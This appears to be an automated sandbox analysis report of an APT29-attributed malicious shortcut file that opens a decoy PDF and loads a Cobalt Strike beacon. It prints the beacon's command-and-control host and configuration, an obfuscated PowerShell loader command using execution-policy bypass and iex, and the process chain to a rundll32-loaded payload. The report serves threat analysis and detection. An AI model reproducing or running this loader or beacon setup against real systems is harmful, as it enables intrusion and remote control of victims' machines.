Analysis
- max time kernel: 93s
- max time network: 140s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 06-03-2021 19:40
Static task static1

Behavioral tasks (sample, resource):
- behavioral1: APT29miniduke.bin.dll (win7v20201028)
- behavioral2: APT29miniduke.bin.dll (win10v20201028)
- behavioral3: CozyBearImplant.bin.exe (win7v20201028)
- behavioral4: CozyBearImplant.bin.exe (win10v20201028)
- behavioral5: ImplantCozy.bin.exe (win7v20201028)
- behavioral6: ImplantCozy.bin.exe (win10v20201028)
- behavioral7: MinidukeAPT29.bin.dll (win7v20201028)
- behavioral8: MinidukeAPT29.bin.dll (win10v20201028)
- behavioral9: Nov2018New!/AudioSes.dll (win7v20201028)
- behavioral10: Nov2018New!/AudioSes.dll (win10v20201028)
- behavioral11: ds7002.lnk (win7v20201028)
- behavioral12: ds7002.lnk (win10v20201028)
- behavioral13: Nov2018New!/ds7002.bin.lnk (win7v20201028)
- behavioral14: Nov2018New!/ds7002.bin.lnk (win10v20201028)
- behavioral15: ds7002.pdf (win7v20201028)
- behavioral16: ds7002.pdf (win10v20201028)
- behavioral17: SeaDaddyImplant (2).bin.exe (win7v20201028)
- behavioral18: SeaDaddyImplant (2).bin.exe (win10v20201028)
- behavioral19: SeaDaddyImplant.bin.exe (win7v20201028)
- behavioral20: SeaDaddyImplant.bin.exe (win10v20201028)
- behavioral21: TrojanCozyBear.bin.exe (win7v20201028)
- behavioral22: TrojanCozyBear.bin.exe (win10v20201028)
- behavioral23: atiagentCozyBear.bin.dll (win7v20201028)
- behavioral24: atiagentCozyBear.bin.dll (win10v20201028)
General
- Target: ds7002.lnk
- Size: 392KB
- MD5: 6ed0020b0851fb71d5b0076f4ee95f3c
- SHA1: e431261c63f94a174a1308defccc674dabbe3609
- SHA256: 2cea2a1f53dac3f4fff156eacc2ecc8e98b1a64f0f5b5ee1c42c69d9a226c55c
- SHA512: 2a0b04791ab102b6d1760c5f0940969318562f444a5864ebf270f568cc8f6283630ca76377a9fc75691b67e7c459ab10782a2deb439fa9981a2f94bb208232f3
Malware Config
Extracted: cobaltstrike
http://pandorasong.com:443/access/
- access_type: 512
- beacon_type: 2048
- create_remote_thread: 0
- day: 0
- dns_idle: 0
- dns_sleep: 0
- host: pandorasong.com,/access/
- http_header1: AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAeR2V0Q29udGVudEZlYXR1cmVzLkRMTkEuT1JHOiAxAAAACgAAABVIb3N0OiBwYW5kb3Jhc29uZy5jb20AAAAKAAAASENvb2tpZTogIF9fdXRtYT0zMTAwNjY3MzMuMjg4NDUzNDQ0MC4xNDMzMjAxNDYyLjE0MDMyMDQzNzIuMTM4NTIwMjQ5OC43OwAAAAkAAAAJdmVyc2lvbj00AAAACQAAAA5saWQ9MTU4MjUwMjcyNAAAAAcAAAAAAAAACAAAAAUAAAAFdG9rZW4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
- http_header2: AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAWQ29udGVudC1UeXBlOiB0ZXh0L3htbAAAAAoAAAAgWC1SZXF1ZXN0ZWQtV2l0aDogWE1MSHR0cFJlcXVlc3QAAAAKAAAAFUhvc3Q6IHBhbmRvcmFzb25nLmNvbQAAAAcAAAAAAAAABQAAAANyaWQAAAAJAAAADmxpZD0xNjgzNTAzNzM1AAAACQAAAB9tZXRob2Q9Z2V0U2VhcmNoUmVjb21tZW5kYXRpb25zAAAABwAAAAEAAAADAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
- http_method1: GET
- http_method2: POST
- injection_process:
- jitter: 4352
- maxdns: 255
- month: 0
- pipe_name: \\%s\pipe\msagent_%x
- polling_time: 300000
- port_number: 443
- proxy_password:
- proxy_server:
- proxy_username:
- sc_process32: %windir%\syswow64\rundll32.exe
- sc_process64: %windir%\sysnative\rundll32.exe
- state_machine: MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCN7UFLcBHjvme4lLXoOKMyNrF46j4Xi87J4ilrNPDQxLOq2KHaCXP+0FsWYs7JFqLXGmqOIfALpPLIyGgnRuC60ZXaSKmCENE2O88Z0BxDkRxSaKEbgv3ETo/Ra7cF8JNr3szy0sNBVyi9dhS2WhXRIU923X2ZQxbpSyUNi5Q//wIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
- unknown1: 7.382016e+08
- unknown2: AAAABAAAAAIAAAAQAAAAAgAAABAAAAACAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
- unknown3: 0
- unknown4: 0
- unknown5: 2.350256387e+09
- uri: /radio/xmlrpc/v45
- user_agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
- year: 0
Signatures
- Cobaltstrike
  Detected malicious payload which is part of Cobaltstrike.
- Loads dropped DLL (1 IoCs)
  Processes: pid 3960 rundll32.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Checks processor information in registry (2 TTPs, 2 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes (description | ioc | process):
  - Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | AcroRd32.exe
  - Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | AcroRd32.exe
- Modifies Internet Explorer settings (1 IoCs)
  Processes (description | ioc | process):
  - Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | AcroRd32.exe
- Modifies registry class (1 IoCs)
  Processes (description | ioc | process):
  - Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings | powershell.exe
- Suspicious behavior: EnumeratesProcesses (21 IoCs)
  Processes: pid 748 powershell.exe (5 entries); pid 4088 AcroRd32.exe (16 entries)
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes: Token: SeDebugPrivilege | pid 748 powershell.exe
- Suspicious use of FindShellTrayWindow (1 IoCs)
  Processes: pid 4088 AcroRd32.exe
- Suspicious use of SetWindowsHookEx (7 IoCs)
  Processes: pid 4088 AcroRd32.exe (7 entries)
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (source pid/process -> target pid/process; 64 entries, duplicate rows collapsed):
  - 1308 cmd.exe -> 748 powershell.exe
  - 748 powershell.exe -> 648 csc.exe
  - 648 csc.exe -> 2776 cvtres.exe
  - 748 powershell.exe -> 2464 csc.exe
  - 2464 csc.exe -> 360 cvtres.exe
  - 748 powershell.exe -> 4088 AcroRd32.exe
  - 748 powershell.exe -> 3960 rundll32.exe
  - 4088 AcroRd32.exe -> 3944 RdrCEF.exe
  - 3944 RdrCEF.exe -> 3828 RdrCEF.exe
  - 3944 RdrCEF.exe -> 1152 RdrCEF.exe
Processes (indentation shows the process tree; the number in brackets is the tree depth)
- [1] C:\Windows\system32\cmd.exe
  cmdline: cmd /c C:\Users\Admin\AppData\Local\Temp\ds7002.lnk
  signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noni -ep bypass $zk='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';$fz='FromBase'+0x40+'String';$rhia=[Text.Encoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;
    signatures: Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qm4epklo\qm4epklo.cmdline"
      signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8562.tmp" "c:\Users\Admin\AppData\Local\Temp\qm4epklo\CSC7552A301EA074411BC475A8B99736BCE.TMP"
    - [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ua5jr1wv\ua5jr1wv.cmdline"
      signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES862D.tmp" "c:\Users\Admin\AppData\Local\Temp\ua5jr1wv\CSCA4AB05B7D56441ADA22692FF7976C61F.TMP"
    - [3] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
      cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ds7002.PDF"
      signatures: Checks processor information in registry; Modifies Internet Explorer settings; Suspicious behavior: EnumeratesProcesses; Suspicious use of FindShellTrayWindow; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
      - [4] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        signatures: Suspicious use of WriteProcessMemory
        - [5] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C763C67BCC8B05ED84E1D58E20AA2B7C --mojo-platform-channel-handle=1640 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        - [5] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=736B1FEE9DB1F07E6D5729D52C467B30 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=736B1FEE9DB1F07E6D5729D52C467B30 --renderer-client-id=2 --mojo-platform-channel-handle=1632 --allow-no-sandbox-job /prefetch:1
        - [5] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A1E0F5243F469E398BCB2122E5F4C2FA --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A1E0F5243F469E398BCB2122E5F4C2FA --renderer-client-id=4 --mojo-platform-channel-handle=2216 --allow-no-sandbox-job /prefetch:1
        - [5] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F09A9D54645AA85A8A683EAC3C4DB114 --mojo-platform-channel-handle=2444 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        - [5] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=354CD58114EDC64D4772F53BB259D3AE --mojo-platform-channel-handle=2668 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        - [5] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A4FFCE97BC80E07D6639C7AF772B5190 --mojo-platform-channel-handle=2680 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    - [3] C:\Windows\system32\rundll32.exe
      cmdline: "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\cyzfc.dat, PointFunctionCall
      signatures: Loads dropped DLL
Downloads
- C:\Users\Admin\AppData\Local\Temp\RES8562.tmp
  MD5: 54043aeaa27f3192242feef8d0767116
  SHA1: 965dc59465da37c8df153e30088b5663e577d8bb
  SHA256: 86ce7b91e871b76095c1fe5aa359bd455f7a072f173342e64cc654d9f7cc4109
  SHA512: 2a0046d32c0127d2da396e1989c6ee21a1a8dfd469a9f8cc3ffe3c44ca1912183a894e13960aaa67f032e886904b36a5341ae7db05fc54198e290cc57102f84b
- C:\Users\Admin\AppData\Local\Temp\RES862D.tmp
  MD5: 7ce711dff3fc3086ce3cb0148d7c52bb
  SHA1: cf8202ec95697702ee1d0ae9b09e47846a013847
  SHA256: d58878146ca0facecb4d9f8080267e60ad0f69695263b87dde4159f04bcc6386
  SHA512: c63987b733b143fcd2a7f73af8707c6d55ed086b4046e57aa648153beff84640c7a12e0bd10b6f86e972c8a18ba5b0cc82fe82c8b048d70219731c4d06eb7e28
- C:\Users\Admin\AppData\Local\Temp\ds7002.PDF
  MD5: 313f4808aa2a2073005d219bc68971cd
  SHA1: 053fb60530e884851eb8b6aebbec4570ec788d4a
  SHA256: b1c811d3f0e930b0096a9e785f730ba4d92458bd6dcfbdff4cf7a1e247ef20d1
  SHA512: 1d983f3c659eb3dfac3fe280e7cb3c6e25264752c11ff7d2ab232ffbf30b659a3d61bdf3773ec32caa09de716a3c439dea0d77dab5cb9e07d0e6ec43a0b1a68d
- C:\Users\Admin\AppData\Local\Temp\qm4epklo\qm4epklo.dll
  MD5: 4119ebfd7a6abc4e4e11c8565c9a5829
  SHA1: 0b470f9193ab799c295558bdc5e5e8bc96f30071
  SHA256: 3e20fb63db39654e5959c5d73591f5991be679608af65acc0b37abdade4442f2
  SHA512: 4c080f1d211aaf95d760e3dae3b6bf8c158fe998e23c3b087132321155fe5a5f4e98e15f31d0a57fdb64e69dd15453d30bdf924b2caf45977caaa5bd3ffc6046
- C:\Users\Admin\AppData\Local\Temp\ua5jr1wv\ua5jr1wv.dll
  MD5: 8d6b661ca8cfe06c9fb7dd5c89f5f337
  SHA1: 7206625b569cd52aaa20db542d4f4562d5f10dd6
  SHA256: 9333166d8cea299a9e564b66d2d49f7ac7e15b5110de7163d811e922fc53090b
  SHA512: b62310d1c3b4f0958a923eaca99bb39da245ac9c542fcee1d163e9d3cd6767183a5056f49ab88b729d7c4741ef6c6017ebbcb6ee67d06c1aa387149973bbb453
- C:\Users\Admin\AppData\Local\cyzfc.dat
  MD5: 16bbc967a8b6a365871a05c74a4f345b
  SHA1: 9858d5cb2a6614be3c48e33911bf9f7978b441bf
  SHA256: b77ff307ea74a3ab41c92036aea4a049b3c2e69b12a857d26910e535544dfb05
  SHA512: 68c75c95ee27fd704088dcf381378a2cd32b396a2e405be4e4f8058cf099d88c9f22c9b9a14eaec45880a2b7ae02226f1277020470aadbc153e8dd3168711f99
- \??\c:\Users\Admin\AppData\Local\Temp\qm4epklo\CSC7552A301EA074411BC475A8B99736BCE.TMP
  MD5: 152282baec007a686075a13f9f7e330a
  SHA1: aeea85744670a678d03ee92cb5ec3f7f092ef74a
  SHA256: c5d5bb126b3ea7b2bb37b03deb62aa4020ba15e3f3d938cb6c888154163a68b4
  SHA512: f2c551f29a9c7d741eeeb654c8fa8bd11747f6fff505b5d7a124c602f7ae2fd78dce55648bd8e6cc0591fb39d85c33f5c7d4c9a8cdf8e7bfdafc9bb31f5826ee
- \??\c:\Users\Admin\AppData\Local\Temp\qm4epklo\qm4epklo.0.cs
  MD5: cdcb629e6587254315606a6ba3764745
  SHA1: d5b706ca48b7af8926926e80565148f725c75393
  SHA256: 3c131fcda0193278274e4ae82bf8363e17fcc0d1110d486072061549e0b0db55
  SHA512: 29f17e62d18c716445e09f10dfcae7e5eef72ce0a64a3a9bd8e30108beabe55029f4b70ed5f4926772c791e7fb688b7f2d0ff777641bd86c79421189b7a8cadc
- \??\c:\Users\Admin\AppData\Local\Temp\qm4epklo\qm4epklo.cmdline
  MD5: db65d638ba32ab4cf93bcbee25e64ba6
  SHA1: af567d17554440e8d57087d337a95879b9ff3f69
  SHA256: 4869f1f6e700c4b5b0f46d0a4a8c14d1278ee08b836f2f3cb9ef06b61c2b4ade
  SHA512: 0b5b893adc1c1d724295589fce0df028db76c49fbc5d661a8a3192153cded1d0d3fa8138bb7dc9739394e0bc7b68c006e4735bc9091c8fb623e0b7d7c1051f47
- \??\c:\Users\Admin\AppData\Local\Temp\ua5jr1wv\CSCA4AB05B7D56441ADA22692FF7976C61F.TMP
  MD5: 75106530adee600cd311237e606f6bd9
  SHA1: d8a117e1c43d3d650f3ca774aae95e33f9200ada
  SHA256: 37f3cacfd2d21ebd885dd2e77f66c3ab0789bc207a7cc8fc6a5c00f10747568f
  SHA512: 521d2ec49aa3b2f8a0421b5498148558944b1091cf222a64bf3a25b504584ffa6c7dc3839e12e61470a31b5ecf34697ae5699fec64bc6b228ac5a8394461dc20
- \??\c:\Users\Admin\AppData\Local\Temp\ua5jr1wv\ua5jr1wv.0.cs
  MD5: 171a88ab4fad87acfd2e5032eb0c6113
  SHA1: 754de0e7656c558d335710fc41cbf196d39c1a19
  SHA256: 5473b5550a65171ee7d5977d673c97e41e9ec16fad10ec5ab8aa3b7c798577a6
  SHA512: 87ef6ac53a00d21f2df4d81ec5956861a4b539b10f5855345aa068c0d9d971f3329477e485471eb40b9eeea59f01fd3c42c4ab2f25e71d825cbf3586be0206b8
- \??\c:\Users\Admin\AppData\Local\Temp\ua5jr1wv\ua5jr1wv.cmdline
  MD5: 3d50066f6fd85df784c48a58a6b52640
  SHA1: b281e5737386ca8fdb3c52405ac57b57fe82b29c
  SHA256: 48f4a3c8042f5b18f0ed5bc0117d84cb9b971e25b082bba6a02db37353fde3c4
  SHA512: 4e78270a02da3166c4e07d8b562d530c1817e07d2e577bbe76baea83b90e2a5def7712384d61a51d39d83bc6488449e0336da1b22cc0aa9a078f9dd791efe10c
- \Users\Admin\AppData\Local\cyzfc.dat
  MD5: 16bbc967a8b6a365871a05c74a4f345b
  SHA1: 9858d5cb2a6614be3c48e33911bf9f7978b441bf
  SHA256: b77ff307ea74a3ab41c92036aea4a049b3c2e69b12a857d26910e535544dfb05
  SHA512: 68c75c95ee27fd704088dcf381378a2cd32b396a2e405be4e4f8058cf099d88c9f22c9b9a14eaec45880a2b7ae02226f1277020470aadbc153e8dd3168711f99
Memory dumps (file, size where given):
- memory/360-20-0x0000000000000000-mapping.dmp
- memory/648-8-0x0000000000000000-mapping.dmp
- memory/748-4-0x000001C9746D0000-0x000001C9746D1000-memory.dmp (4KB)
- memory/748-3-0x00007FF8DA440000-0x00007FF8DAE2C000-memory.dmp (9.9MB)
- memory/748-16-0x000001C974D80000-0x000001C974D81000-memory.dmp (4KB)
- memory/748-7-0x000001C972613000-0x000001C972615000-memory.dmp (8KB)
- memory/748-2-0x0000000000000000-mapping.dmp
- memory/748-6-0x000001C972610000-0x000001C972612000-memory.dmp (8KB)
- memory/748-24-0x000001C974D90000-0x000001C974D91000-memory.dmp (4KB)
- memory/748-5-0x000001C974DF0000-0x000001C974DF1000-memory.dmp (4KB)
- memory/748-9-0x000001C972616000-0x000001C972618000-memory.dmp (8KB)
- memory/1152-38-0x0000000000000000-mapping.dmp
- memory/1152-37-0x0000000077A82000-0x0000000077A8200C-memory.dmp (12B)
- memory/2464-17-0x0000000000000000-mapping.dmp
- memory/2776-12-0x0000000000000000-mapping.dmp
- memory/3396-42-0x0000000077A82000-0x0000000077A8200C-memory.dmp (12B)
- memory/3396-43-0x0000000000000000-mapping.dmp
- memory/3828-35-0x0000000000000000-mapping.dmp
- memory/3828-34-0x0000000077A82000-0x0000000077A8200C-memory.dmp (12B)
- memory/3944-33-0x0000000000000000-mapping.dmp
- memory/3960-32-0x00000216EDD00000-0x00000216EDD7E000-memory.dmp (504KB)
- memory/3960-31-0x00000216EDAD0000-0x00000216EDB10000-memory.dmp (256KB)
- memory/3960-29-0x000000006BAC0000-0x000000006BB0F000-memory.dmp (316KB)
- memory/3960-26-0x0000000000000000-mapping.dmp
- memory/4088-25-0x0000000000000000-mapping.dmp
- memory/4184-47-0x0000000077A82000-0x0000000077A8200C-memory.dmp (12B)
- memory/4184-48-0x0000000000000000-mapping.dmp
- memory/4292-50-0x0000000077A82000-0x0000000077A8200C-memory.dmp (12B)
- memory/4292-51-0x0000000000000000-mapping.dmp
- memory/4384-53-0x0000000077A82000-0x0000000077A8200C-memory.dmp (12B)
- memory/4384-54-0x0000000000000000-mapping.dmp